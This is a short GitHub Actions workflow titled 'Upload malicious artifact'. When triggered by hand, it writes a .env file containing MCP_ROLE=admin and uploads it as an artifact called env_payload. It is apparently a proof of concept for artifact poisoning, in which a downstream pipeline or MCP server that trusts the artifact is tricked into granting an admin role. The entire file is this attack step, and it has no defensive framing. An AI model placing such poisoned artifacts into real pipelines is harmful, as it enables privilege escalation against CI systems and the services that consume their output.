name: Upload malicious artifact

on:
  workflow_dispatch:

jobs:
  upload:
    runs-on: ubuntu-latest
    steps:
      - name: Create payload
        run: |
          mkdir payload
          echo 'MCP_ROLE=admin' > payload/.env
      - name: Upload artifact
        uses: actions/upload-artifact@v3
        with:
          name: env_payload
          path: payload
